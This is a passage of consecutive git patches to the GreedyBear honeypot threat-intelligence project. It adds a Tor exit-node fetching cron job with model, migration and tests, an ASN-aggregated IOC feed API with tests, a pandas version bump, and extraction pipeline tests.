+import requests
+
+from greedybear.cronjobs.base import Cronjob
+from greedybear.cronjobs.extraction.utils import is_valid_ipv4
+from greedybear.cronjobs.repositories import IocRepository
+from greedybear.cronjobs.repositories.tor import TorRepository
+
+
+class TorExitNodesCron(Cronjob):
+    """Fetch and store Tor exit node IP addresses from Tor Project."""
+
+    def __init__(self, tor_repo=None, ioc_repo=None):
+        super().__init__()
+        self.tor_repo = tor_repo if tor_repo is not None else TorRepository()
+        self.ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
+
+    def run(self) -> None:
+        """Fetch Tor exit node IPs from torproject.org and store them."""
+        ip_regex = re.compile(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}")
+
+        try:
+            self.log.info("Starting download of Tor exit node list from torproject.org")
+
+            r = requests.get(
+                "https://check.torproject.org/exit-addresses",
+                timeout=10,
+            )
+            r.raise_for_status()
+
+            findings = ip_regex.findall(r.text)
+
+            for ip_candidate in findings:
+                is_valid, ip_address = is_valid_ipv4(ip_candidate)
+                if not is_valid:
+                    self.log.debug(f"Invalid IPv4 address: {ip_candidate}")
+                    continue
+
+                tor_node, created = self.tor_repo.get_or_create(ip_address)
+                if created:
+                    self.log.info(f"Added new Tor exit node {ip_address}")
+                    self._update_old_ioc(ip_address)
+
+            self.log.info("Completed download of Tor exit node list")
+
+        except requests.RequestException as e:
+            self.log.error(f"Failed to fetch Tor exit nodes: {e}")
+            raise
+
+    def _update_old_ioc(self, ip_address: str):
+        """Update the IP reputation of an existing IOC to mark it as a Tor exit node."""
+        updated = self.ioc_repo.update_ioc_reputation(ip_address, "tor exit node")
+        if updated:
+            self.log.debug(f"Updated IOC {ip_address} reputation to 'tor exit node'")
diff --git a/greedybear/migrations/0032_torexitnode.py b/greedybear/migrations/0032_torexitnode.py
new file mode 100644
index 00000000..d35b5ebf
--- /dev/null
+++ b/greedybear/migrations/0032_torexitnode.py
@@ -0,0 +1,35 @@
+# Generated by Django 5.2.10 on 2026-01-26 10:00
+
+import datetime
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+    dependencies = [
+        ("greedybear", "0031_remove_cowrie_log4j_fields"),
+    ]
+
+    operations = [
+        migrations.CreateModel(
+            name="TorExitNode",
+            fields=[
+                (
+                    "id",
+                    models.BigAutoField(
+                        auto_created=True,
+                        primary_key=True,
+                        serialize=False,
+                        verbose_name="ID",
+                    ),
+                ),
+                ("ip_address", models.CharField(max_length=256, unique=True)),
+                ("added", models.DateTimeField(default=datetime.datetime.now)),
+                ("reason", models.CharField(blank=True, default="tor exit node", max_length=64)),
+            ],
+        ),
+        migrations.AddIndex(
+            model_name="torexitnode",
+            index=models.Index(fields=["ip_address"], name="greedybear_ip_addr_tor_idx"),
+        ),
+    ]
diff --git a/greedybear/models.py b/greedybear/models.py
index dc71c6be..9aee1fdf 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -154,6 +154,20 @@ def __str__(self):
         return f"{self.ip_address}{f' ({self.reason})' if self.reason else ''}"
 
 
+class TorExitNode(models.Model):
+    ip_address = models.CharField(max_length=256, blank=False, unique=True)
+    added = models.DateTimeField(blank=False, default=datetime.now)
+    reason = models.CharField(max_length=64, blank=True, default="tor exit node")
+
+    class Meta:
+        indexes = [
+            models.Index(fields=["ip_address"]),
+        ]
+
+    def __str__(self):
+        return f"{self.ip_address} (tor exit node)"
+
+
 class WhatsMyIPDomain(models.Model):
     domain = models.CharField(max_length=256, blank=False)
     added = models.DateTimeField(blank=False, default=datetime.now)
diff --git a/greedybear/tasks.py b/greedybear/tasks.py
index f3c24786..db2e9bb4 100644
--- a/greedybear/tasks.py
+++ b/greedybear/tasks.py
@@ -76,3 +76,10 @@ def extract_firehol_lists():
     from greedybear.cronjobs.firehol import FireHolCron
 
     FireHolCron().execute()
+
+
+@shared_task()
+def get_tor_exit_nodes():
+    from greedybear.cronjobs.tor_exit_nodes import TorExitNodesCron
+
+    TorExitNodesCron().execute()
diff --git a/tests/test_tor.py b/tests/test_tor.py
new file mode 100644
index 00000000..7b403a67
--- /dev/null
+++ b/tests/test_tor.py
@@ -0,0 +1,97 @@
+from unittest.mock import Mock, patch
+
+import requests
+
+from greedybear.cronjobs.repositories.tor import TorRepository
+from greedybear.cronjobs.tor_exit_nodes import TorExitNodesCron
+from tests import CustomTestCase
+
+
+class TestTorRepository(CustomTestCase):
+    """Test cases for TorRepository."""
+
+    def setUp(self):
+        """Set up test fixtures."""
+        self.repo = TorRepository()
+
+    @patch("greedybear.models.TorExitNode.objects.get_or_create")
+    def test_get_or_create_new_tor_node(self, mock_get_or_create):
+        """Test creating a new Tor exit node entry."""
+        # Arrange
+        mock_node = Mock()
+        mock_get_or_create.return_value = (mock_node, True)
+
+        # Act
+        node, created = self.repo.get_or_create("1.2.3.4")
+
+        # Assert
+        self.assertTrue(created)
+        mock_get_or_create.assert_called_once_with(ip_address="1.2.3.4", defaults={"reason": "tor exit node"})
+
+    @patch("greedybear.models.TorExitNode.objects.get_or_create")
+    def test_get_or_create_existing_tor_node(self, mock_get_or_create):
+        """Test getting an existing Tor exit node entry."""
+        # Arrange
+        mock_node = Mock()
+        mock_get_or_create.return_value = (mock_node, False)
+
+        # Act
+        node, created = self.repo.get_or_create("1.2.3.4")
+
+        # Assert
+        self.assertFalse(created)
+
+
+class TestTorExitNodesCron(CustomTestCase):
+    """Test cases for TorExitNodesCron."""
+
+    def setUp(self):
+        """Set up test fixtures."""
+        self.mock_tor_repo = Mock()
+        self.mock_ioc_repo = Mock()
+        self.cron = TorExitNodesCron(tor_repo=self.mock_tor_repo, ioc_repo=self.mock_ioc_repo)
+
+    @patch("greedybear.cronjobs.tor_exit_nodes.requests.get")
+    @patch("greedybear.cronjobs.tor_exit_nodes.is_valid_ipv4")
+    def test_run_success(self, mock_is_valid, mock_requests_get):
+        """Test successful Tor exit nodes fetching."""
+        # Arrange
+        mock_response = Mock()
+        mock_response.text = "ExitAddress 1.2.3.4\\nExitAddress 5.6.7.8"
+        mock_requests_get.return_value = mock_response
+
+        # Mock validation to return valid for both IPs
+        mock_is_valid.side_effect = [(True, "1.2.3.4"), (True, "5.6.7.8")]
+
+        # Mock repository to return created=True
+        self.mock_tor_repo.get_or_create.side_effect = [(Mock(), True), (Mock(), True)]
+
+        # Act
+        self.cron.run()
+
+        # Assert
+        mock_requests_get.assert_called_once_with("https://check.torproject.org/exit-addresses", timeout=10)
+        self.assertEqual(self.mock_tor_repo.get_or_create.call_count, 2)
+        self.assertEqual(self.mock_ioc_repo.update_ioc_reputation.call_count, 2)
+
+    @patch("greedybear.cronjobs.tor_exit_nodes.requests.get")
+    def test_run_request_failure(self, mock_requests_get):
+        """Test handling of request failures."""
+        # Arrange
+        mock_requests_get.side_effect = requests.RequestException("Network error")
+
+        # Act & Assert
+        with self.assertRaises(requests.RequestException):
+            self.cron.run()
+
+    @patch("greedybear.cronjobs.tor_exit_nodes.is_valid_ipv4")
+    def test_update_old_ioc(self, mock_is_valid):
+        """Test updating existing IOCs."""
+        # Arrange
+        self.mock_ioc_repo.update_ioc_reputation.return_value = True
+
+        # Act
+        self.cron._update_old_ioc("1.2.3.4")
+
+        # Assert
+        self.mock_ioc_repo.update_ioc_reputation.assert_called_once_with("1.2.3.4", "tor exit node")

From 82713d4cc9cf247864bcb414c1fbc11494cec756 Mon Sep 17 00:00:00 2001
From: Dorna Raj Gyawali <dronarajgyawali@gmail.com>
Date: Tue, 27 Jan 2026 17:17:43 +0545
Subject: [PATCH 62/75] feat(api): add ASN-aggregated IOC statistics . CLOSES
 #458 (#718)

* feat(api): add ASN-aggregated IOC statistics

* refactor: db level aggregation

* refactor: missing args

* resolve linter issue

* refactor: agg logic

* chores: minor issues resolved
---
 api/serializers.py  |  26 +++++++
 api/urls.py         |   2 +
 api/views/feeds.py  |  45 +++++++++++
 api/views/utils.py  |  93 +++++++++++++++++++---
 tests/test_views.py | 182 +++++++++++++++++++++++++++++++++++++++++++-
 5 files changed, 335 insertions(+), 13 deletions(-)

diff --git a/api/serializers.py b/api/serializers.py
index 83b9da1a..ba2b0ce9 100644
--- a/api/serializers.py
+++ b/api/serializers.py
@@ -118,6 +118,32 @@ def validate_ordering(self, ordering):
         return ordering_validation(ordering)
 
 
+class ASNFeedsOrderingSerializer(FeedsRequestSerializer):
+    ALLOWED_ORDERING_FIELDS = frozenset(
+        {
+            "asn",
+            "ioc_count",
+            "total_attack_count",
+            "total_interaction_count",
+            "total_login_attempts",
+            "expected_ioc_count",
+            "expected_interactions",
+            "first_seen",
+            "last_seen",
+        }
+    )
+
+    def validate_ordering(self, ordering):
+        field_name = ordering.lstrip("-").strip()
+
+        if field_name not in self.ALLOWED_ORDERING_FIELDS:
+            raise serializers.ValidationError(
+                f"Invalid ordering field for ASN aggregated feed: '{field_name}'. Allowed fields: {', '.join(sorted(self.ALLOWED_ORDERING_FIELDS))}"
+            )
+
+        return ordering
+
+
 class FeedsResponseSerializer(serializers.Serializer):
     """
     Serializer for feed response data structure.
diff --git a/api/urls.py b/api/urls.py
index 7202fc10..f426151e 100644
--- a/api/urls.py
+++ b/api/urls.py
@@ -10,6 +10,7 @@
     enrichment_view,
     feeds,
     feeds_advanced,
+    feeds_asn,
     feeds_pagination,
     general_honeypot_list,
 )
@@ -22,6 +23,7 @@
 urlpatterns = [
     path("feeds/", feeds_pagination),
     path("feeds/advanced/", feeds_advanced),
+    path("feeds/asn/", feeds_asn),
     path("feeds/<str:feed_type>/<str:attack_type>/<str:prioritize>.<str:format_>", feeds),
     path("enrichment", enrichment_view),
     path("cowrie_session", cowrie_session_view),
diff --git a/api/views/feeds.py b/api/views/feeds.py
index 617df2ac..c6e56524 100644
--- a/api/views/feeds.py
+++ b/api/views/feeds.py
@@ -10,9 +10,12 @@
     permission_classes,
 )
 from rest_framework.permissions import IsAuthenticated
+from rest_framework.response import Response
 
+from api.serializers import ASNFeedsOrderingSerializer
 from api.views.utils import (
     FeedRequestParams,
+    asn_aggregated_queryset,
     feeds_response,
     get_queryset,
     get_valid_feed_types,
@@ -116,3 +119,45 @@ def feeds_advanced(request):
         resp_data = feeds_response(iocs, feed_params, valid_feed_types, dict_only=True, verbose=verbose)
         return paginator.get_paginated_response(resp_data)
     return feeds_response(iocs_queryset, feed_params, valid_feed_types, verbose=verbose)
+
+
+@api_view(["GET"])
+@authentication_classes([CookieTokenAuthentication])
+@permission_classes([IsAuthenticated])
+def feeds_asn(request):
+    """
+    Retrieve aggregated IOC feed data grouped by ASN (Autonomous System Number).
+
+    Args:
+        request: The HTTP request object.
+        feed_type (str): Filter by feed type (e.g., 'cowrie', 'log4j'). Default: 'all'.
+        attack_type (str): Filter by attack type (e.g., 'scanner', 'payload_request'). Default: 'all'.
+        max_age (int): Maximum age of IOCs in days. Default: 3.
+        min_days_seen (int): Minimum days an IOC must have been observed. Default: 1.
+        exclude_reputation (str): ';'-separated reputations to exclude (e.g., 'mass scanner'). Default: none.
+        ordering (str): Aggregation ordering field (e.g., 'total_attack_count', 'asn'). Default: '-ioc_count'.
+        asn (str, optional): Filter results to a single ASN.
+
+    Returns:
+     Response: HTTP response with a JSON list of ASN aggregation objects.
+     Each object contains:
+            asn (int): ASN number.
+            ioc_count (int): Number of IOCs for this ASN.
+            total_attack_count (int): Sum of attack_count for all IOCs.
+            total_interaction_count (int): Sum of interaction_count for all IOCs.
+            total_login_attempts (int): Sum of login_attempts for all IOCs.
+            honeypots (List[str]): Sorted list of unique honeypots that observed these IOCs.
+            expected_ioc_count (float): Sum of recurrence_probability for all IOCs, rounded to 4 decimals.
+            expected_interactions (float): Sum of expected_interactions for all IOCs, rounded to 4 decimals.
+            first_seen (DateTime): Earliest first_seen timestamp among IOCs.
+            last_seen (DateTime): Latest last_seen timestamp among IOCs.
+    """
+    logger.info(f"request /api/feeds/asn/ with params: {request.query_params}")
+    feed_params = FeedRequestParams(request.query_params)
+    valid_feed_types = get_valid_feed_types()
+
+    iocs_qs = get_queryset(request, feed_params, valid_feed_types, is_aggregated=True, serializer_class=ASNFeedsOrderingSerializer)
+
+    asn_aggregates = asn_aggregated_queryset(iocs_qs, request, feed_params)
+    data = list(asn_aggregates)
+    return Response(data)
diff --git a/api/views/utils.py b/api/views/utils.py
index cded1e9b..1bd77d89 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -8,7 +8,7 @@
 
 from django.conf import settings
 from django.contrib.postgres.aggregates import ArrayAgg
-from django.db.models import F
+from django.db.models import Count, F, Max, Min, Sum
 from django.http import HttpResponse, HttpResponseBadRequest, StreamingHttpResponse
 from rest_framework import status
 from rest_framework.response import Response
@@ -121,7 +121,7 @@ def get_valid_feed_types() -> frozenset[str]:
     return frozenset(feed_types)
 
 
-def get_queryset(request, feed_params, valid_feed_types):
+def get_queryset(request, feed_params, valid_feed_types, is_aggregated=False, serializer_class=FeedsRequestSerializer):
     """
     Build a queryset to filter IOC data based on the request parameters.
 
@@ -129,6 +129,15 @@ def get_queryset(request, feed_params, valid_feed_types):
         request: The incoming request object.
         feed_params: A FeedRequestParams instance.
         valid_feed_types (frozenset): The set of all valid feed types.
+        is_aggregated (bool, optional):
+            - If True, disables slicing (`feed_size`) and model-level ordering.
+            - Ensures full dataset is available for aggregation or specialized computation.
+            - Default: False.
+        serializer_class (class, optional):
+            - Serializer class used to validate request parameters.
+            - Allows injecting a custom serializer to enforce rules for specific feed types
+              (e.g., to restrict ordering fields or validation for specialized feeds).
+            - Default: `FeedsRequestSerializer`.
 
     Returns:
         QuerySet: The filtered queryset of IOC data.
@@ -139,7 +148,7 @@ def get_queryset(request, feed_params, valid_feed_types):
         f"Age: {feed_params.max_age}, format: {feed_params.format}"
     )
 
-    serializer = FeedsRequestSerializer(
+    serializer = serializer_class(
         data=vars(feed_params),
         context={"valid_feed_types": valid_feed_types},
     )
@@ -161,15 +170,14 @@ def get_queryset(request, feed_params, valid_feed_types):
     if feed_params.include_reputation:
         query_dict["ip_reputation__in"] = feed_params.include_reputation
 
-    iocs = (
-        IOC.objects.filter(**query_dict)
-        .filter(general_honeypot__active=True)
-        .exclude(ip_reputation__in=feed_params.exclude_reputation)
-        .annotate(value=F("name"))
-        .annotate(honeypots=ArrayAgg("general_honeypot__name"))
-        .distinct()
-        .order_by(feed_params.ordering)[: int(feed_params.feed_size)]
-    )
+    iocs = IOC.objects.filter(**query_dict).exclude(ip_reputation__in=feed_params.exclude_reputation).annotate(value=F("name")).distinct()
+
+    # aggregated feeds calculate metrics differently and need all rows to be accurate.
+    if not is_aggregated:
+        iocs = iocs.filter(general_honeypot__active=True)
+        iocs = iocs.annotate(honeypots=ArrayAgg("general_honeypot__name"))
+        iocs = iocs.order_by(feed_params.ordering)
+        iocs = iocs[: int(feed_params.feed_size)]
 
     # save request source for statistics
     source_ip = str(request.META["REMOTE_ADDR"])
@@ -317,3 +325,64 @@ def is_sha256hash(string: str) -> bool:
         bool: True if the string is a valid SHA-256 hash, False otherwise
     """
     return bool(re.fullmatch(r"^[A-Fa-f0-9]{64}$", string))
+
+
+def asn_aggregated_queryset(iocs_qs, request, feed_params):
+    """
+    Perform DB-level aggregation grouped by ASN.
+
+    Args
+        iocs_qs (QuerySet): Filtered IOC queryset from get_queryset;
+        request (Request): The API request object;
+        feed_params (FeedRequestParams): Validated parameter object
+
+    Returns: A values-grouped queryset with annotated  metrics and honeypot arrays.
+    """
+    asn_filter = request.query_params.get("asn")
+    if asn_filter:
+        iocs_qs = iocs_qs.filter(asn=asn_filter)
+
+    # default ordering is overridden here because of serializer default(-last-seen) behaviour
+    ordering = feed_params.ordering
+    if not ordering or ordering.strip() in {"", "-last_seen", "last_seen"}:
+        ordering = "-ioc_count"
+
+    numeric_agg = (
+        iocs_qs.exclude(asn__isnull=True)
+        .values("asn")
+        .annotate(
+            ioc_count=Count("id"),
+            total_attack_count=Sum("attack_count"),
+            total_interaction_count=Sum("interaction_count"),
+            total_login_attempts=Sum("login_attempts"),
+            expected_ioc_count=Sum("recurrence_probability"),
+            expected_interactions=Sum("expected_interactions"),
+            first_seen=Min("first_seen"),
+            last_seen=Max("last_seen"),
+        )
+        .order_by(ordering)
+    )
+
+    honeypot_agg = (
+        iocs_qs.exclude(asn__isnull=True)
+        .filter(general_honeypot__active=True)
+        .values("asn")
+        .annotate(
+            honeypots=ArrayAgg(
+                "general_honeypot__name",
+                distinct=True,
+            )
+        )
+    )
+
+    hp_lookup = {row["asn"]: row["honeypots"] or [] for row in honeypot_agg}
+
+    # merging numeric aggregate with honeypot names for each asn
+    result = []
+    for row in numeric_agg:
+        asn = row["asn"]
+        row_dict = dict(row)
+        row_dict["honeypots"] = sorted(hp_lookup.get(asn, []))
+        result.append(row_dict)
+
+    return result
diff --git a/tests/test_views.py b/tests/test_views.py
index fe869d60..c09f01ea 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -1,9 +1,10 @@
 from django.conf import settings
 from django.test import override_settings
+from django.utils import timezone
 from rest_framework.test import APIClient
 
 from api.views.utils import is_ip_address, is_sha256hash
-from greedybear.models import GeneralHoneypot, Statistics, ViewType
+from greedybear.models import IOC, GeneralHoneypot, Statistics, ViewType
 
 from . import CustomTestCase
 
@@ -271,6 +272,185 @@ def test_400_feeds_pagination(self):
         self.assertEqual(response.status_code, 400)
 
 
+class FeedsASNViewTestCase(CustomTestCase):
+    """Tests for ASN aggregated feeds API"""
+
+    @classmethod
+    def setUpClass(cls):
+        super().setUpClass()
+        IOC.objects.all().delete()
+        cls.testpot1, _ = GeneralHoneypot.objects.get_or_create(name="testpot1", active=True)
+        cls.testpot2, _ = GeneralHoneypot.objects.get_or_create(name="testpot2", active=True)
+
+        cls.high_asn = "13335"
+        cls.low_asn = "16276"
+
+        cls.ioc_high1 = IOC.objects.create(
+            name="high1.example.com",
+            type="ip",
+            asn=cls.high_asn,
+            attack_count=15,
+            interaction_count=30,
+            login_attempts=5,
+            first_seen=timezone.now() - timezone.timedelta(days=10),
+            recurrence_probability=0.8,
+            expected_interactions=20.0,
+        )
+        cls.ioc_high1.general_honeypot.add(cls.testpot1, cls.testpot2)
+        cls.ioc_high1.save()
+
+        cls.ioc_high2 = IOC.objects.create(
+            name="high2.example.com",
+            type="ip",
+            asn=cls.high_asn,
+            attack_count=5,
+            interaction_count=10,
+            login_attempts=2,
+            first_seen=timezone.now() - timezone.timedelta(days=5),
+            recurrence_probability=0.3,
+            expected_interactions=8.0,
+        )
+        cls.ioc_high2.general_honeypot.add(cls.testpot1, cls.testpot2)
+        cls.ioc_high2.save()
+
+        cls.ioc_low = IOC.objects.create(
+            name="low.example.com",
+            type="ip",
+            asn=cls.low_asn,
+            attack_count=2,
+            interaction_count=5,
+            login_attempts=1,
+            first_seen=timezone.now(),
+            recurrence_probability=0.1,
+            expected_interactions=3.0,
+        )
+        cls.ioc_low.general_honeypot.add(cls.testpot1, cls.testpot2)
+        cls.ioc_low.save()
+
+    def setUp(self):
+        self.client = APIClient()
+        self.client.force_authenticate(user=self.superuser)
+        self.url = "/api/feeds/asn/"
+
+    def _get_results(self, response):
+        payload = response.json()
+        self.assertIsInstance(payload, list)
+        return payload
+
+    def test_200_asn_feed_aggregated_fields(self):
+        """Ensure aggregated fields are computed correctly per ASN using dynamic sums"""
+        response = self.client.get(self.url)
+        self.assertEqual(response.status_code, 200)
+        results = self._get_results(response)
+
+        # filtering high ASN
+        high_item = next((item for item in results if str(item["asn"]) == self.high_asn), None)
+        self.assertIsNotNone(high_item)
+
+        # getting all IOCs for high ASN from the DB
+        high_iocs = IOC.objects.filter(asn=self.high_asn)
+
+        self.assertEqual(high_item["ioc_count"], high_iocs.count())
+        self.assertEqual(high_item["total_attack_count"], sum(i.attack_count for i in high_iocs))
+        self.assertEqual(high_item["total_interaction_count"], sum(i.interaction_count for i in high_iocs))
+        self.assertEqual(high_item["total_login_attempts"], sum(i.login_attempts for i in high_iocs))
+        self.assertAlmostEqual(high_item["expected_ioc_count"], sum(i.recurrence_probability for i in high_iocs))
+        self.assertAlmostEqual(high_item["expected_interactions"], sum(i.expected_interactions for i in high_iocs))
+
+        # validating first_seen / last_seen dynamically
+        self.assertEqual(high_item["first_seen"], min(i.first_seen for i in high_iocs).isoformat())
+        self.assertEqual(high_item["last_seen"], max(i.last_seen for i in high_iocs).isoformat())
+
+        # validating honeypots dynamically
+        expected_honeypots = sorted({hp.name for i in high_iocs for hp in i.general_honeypot.all()})
+        self.assertEqual(sorted(high_item["honeypots"]), expected_honeypots)
+
+    def test_200_asn_feed_default_ordering(self):
+        response = self.client.get(self.url)
+        self.assertEqual(response.status_code, 200)
+        results = self._get_results(response)
+
+        # high_asn has ioc_count=2 > low_asn ioc_count=1
+        self.assertEqual(str(results[0]["asn"]), self.high_asn)
+        self.assertEqual(str(results[1]["asn"]), self.low_asn)
+
+    def test_200_asn_feed_ordering_desc_ioc_count(self):
+        response = self.client.get(self.url + "?ordering=-ioc_count")
+        self.assertEqual(response.status_code, 200)
+        results = self._get_results(response)
+
+        self.assertEqual(str(results[0]["asn"]), self.high_asn)
+
+    def test_200_asn_feed_ordering_asc_ioc_count(self):
+        response = self.client.get(self.url + "?ordering=ioc_count")
+        self.assertEqual(response.status_code, 200)
+        results = self._get_results(response)
+        self.assertEqual(str(results[0]["asn"]), self.low_asn)
+
+    def test_200_asn_feed_ordering_desc_interaction_count(self):
+        response = self.client.get(self.url + "?ordering=-total_interaction_count")
+        self.assertEqual(response.status_code, 200)
+        results = self._get_results(response)
+        self.assertEqual(str(results[0]["asn"]), self.high_asn)
+
+    def test_200_asn_feed_with_asn_filter(self):
+        response = self.client.get(self.url + f"?asn={self.high_asn}")
+        self.assertEqual(response.status_code, 200)
+
+        results = self._get_results(response)
+        self.assertEqual(len(results), 1)
+        self.assertEqual(str(results[0]["asn"]), self.high_asn)
+
+    def test_400_asn_feed_invalid_ordering_honeypots(self):
+        response = self.client.get(self.url + "?ordering=honeypots")
+        self.assertEqual(response.status_code, 400)
+        data = response.json()
+        errors_container = data.get("errors", data)
+        error_list = errors_container.get("ordering", [])
+        self.assertTrue(error_list)
+        error_msg = error_list[0].lower()
+        self.assertIn("honeypots", error_msg)
+        self.assertIn("invalid", error_msg)
+
+    def test_400_asn_feed_invalid_ordering_random(self):
+        response = self.client.get(self.url + "?ordering=xyz123")
+        self.assertEqual(response.status_code, 400)
+        data = response.json()
+        errors_container = data.get("errors", data)
+        error_list = errors_container.get("ordering", [])
+        self.assertTrue(error_list)
+        error_msg = error_list[0].lower()
+        self.assertIn("xyz123", error_msg)
+        self.assertIn("invalid", error_msg)
+
+    def test_400_asn_feed_invalid_ordering_model_field_not_in_agg(self):
+        response = self.client.get(self.url + "?ordering=attack_count")
+        self.assertEqual(response.status_code, 400)
+        data = response.json()
+        errors_container = data.get("errors", data)
+        error_list = errors_container.get("ordering", [])
+        self.assertTrue(error_list)
+        error_msg = error_list[0].lower()
+        self.assertIn("attack_count", error_msg)
+        self.assertIn("invalid", error_msg)
+
+    def test_400_asn_feed_ordering_empty_param(self):
+        response = self.client.get(self.url + "?ordering=")
+        self.assertEqual(response.status_code, 400)
+        data = response.json()
+        errors_container = data.get("errors", data)
+        error_list = errors_container.get("ordering", [])
+        self.assertTrue(error_list)
+        error_msg = error_list[0].lower()
+        self.assertIn("blank", error_msg)
+
+    def test_asn_feed_ignores_feed_size(self):
+        response = self.client.get(self.url + "?feed_size=1")
+        results = response.json()
+        # aggregation should return all ASNs regardless of feed_size
+        self.assertEqual(len(results), 2)
+
+
 class StatisticsViewTestCase(CustomTestCase):
     @classmethod
     def setUpClass(cls):

From bcbc9507a518f9c01e7f2985c856291835b05732 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 28 Jan 2026 10:10:01 +0100
Subject: [PATCH 63/75] Bump pandas from 2.3.3 to 3.0.0 in /requirements (#736)

Bumps [pandas](https://github.com/pandas-dev/pandas) from 2.3.3 to 3.0.0.
- [Release notes](https://github.com/pandas-dev/pandas/releases)
- [Commits](https://github.com/pandas-dev/pandas/compare/v2.3.3...v3.0.0)

---
updated-dependencies:
- dependency-name: pandas
  dependency-version: 3.0.0
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 27a45d8f..b1f1a23e 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -17,7 +17,7 @@ uwsgitop==0.12
 uwsgi==2.0.31
 
 joblib==1.5.3
-pandas==2.3.3
+pandas==3.0.0
 scikit-learn==1.8.0
 numpy==2.4.1
 datasketch==1.9.0

From 66b38a4dc8abdc5a6bbadce290acb64837bace69 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Wed, 28 Jan 2026 17:40:48 +0530
Subject: [PATCH 64/75] Create end-to-end extraction pipeline tests. Progresses
 #636 (#735)

* feat: Add end-to-end tests for ExtractionPipeline (PR 1/2) #636

* test: verify search time window in execute flow

* test: verify grouping logic ensures strategies receive correct hits

* chore: remove unused mock assignments in extraction tests

* test: verify IOC accumulation from multiple strategies

* refactor: standardize TestExecuteEmptyResponse with mock helper

* refactor: use common ExtractionTestCase base class

* test: check for whitespace-only src_ip skipping

* test: check for whitespace-only type skipping

* refactor: deduplicate _create_pipeline_with_mocks into base class

* test: verify exception logging in pipeline strategy execution

* test: explicit patch LEGACY_EXTRACTION in sensor test

* refactor: move MockElasticHit to tests/__init__.py for shared usage
---
 tests/__init__.py                             |  19 +
 .../cronjobs/test_extraction_pipeline.py      | 380 ++++++++++++++++++
 2 files changed, 399 insertions(+)
 create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline.py

diff --git a/tests/__init__.py b/tests/__init__.py
index 690676f3..186afdca 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -226,3 +226,22 @@ def _create_mock_ioc(
         mock.asn = asn
         mock.number_of_days_seen = len(mock.days_seen)
         return mock
+
+
+class MockElasticHit:
+    """Mock Elasticsearch hit that behaves like AttrDict from elasticsearch-dsl."""
+
+    def __init__(self, data: dict):
+        self._data = data
+
+    def __getitem__(self, key):
+        return self._data[key]
+
+    def __contains__(self, key):
+        return key in self._data
+
+    def get(self, key, default=None):
+        return self._data.get(key, default)
+
+    def to_dict(self):
+        return self._data.copy()
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline.py b/tests/greedybear/cronjobs/test_extraction_pipeline.py
new file mode 100644
index 00000000..bcd9aaea
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline.py
@@ -0,0 +1,380 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+End-to-end tests for the ExtractionPipeline class.
+
+Tests the complete extraction workflow from Elasticsearch hits
+through strategy selection, IOC extraction, and scoring.
+"""
+
+from unittest.mock import MagicMock, patch
+
+from tests import ExtractionTestCase, MockElasticHit
+
+
+class ExtractionPipelineTestCase(ExtractionTestCase):
+    """Base test case for extraction pipeline tests, reusing common extraction helpers."""
+
+    def _create_pipeline_with_mocks(self):
+        """Helper to create a pipeline with mocked dependencies."""
+        with (
+            patch("greedybear.cronjobs.extraction.pipeline.SensorRepository"),
+            patch("greedybear.cronjobs.extraction.pipeline.IocRepository"),
+            patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository"),
+        ):
+            from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+            pipeline = ExtractionPipeline()
+            return pipeline
+
+
+class TestExtractionPipelineInit(ExtractionPipelineTestCase):
+    """Tests for ExtractionPipeline initialization."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+    def test_initializes_repositories(self, mock_elastic, mock_ioc, mock_sensor):
+        """Pipeline should initialize all required repositories."""
+        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+        pipeline = ExtractionPipeline()
+
+        mock_elastic.assert_called_once()
+        mock_ioc.assert_called_once()
+        mock_sensor.assert_called_once()
+        self.assertIsNotNone(pipeline.log)
+
+
+class TestMinutesBackToLookup(ExtractionPipelineTestCase):
+    """Tests for the _minutes_back_to_lookup property."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+    @patch("greedybear.cronjobs.extraction.pipeline.INITIAL_EXTRACTION_TIMESPAN", 120)
+    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+    def test_returns_initial_timespan_when_empty(self, mock_elastic, mock_ioc, mock_sensor):
+        """Should return INITIAL_EXTRACTION_TIMESPAN on first run (empty DB)."""
+        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+        pipeline = ExtractionPipeline()
+        pipeline.ioc_repo.is_empty.return_value = True
+
+        result = pipeline._minutes_back_to_lookup
+
+        self.assertEqual(result, 120)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
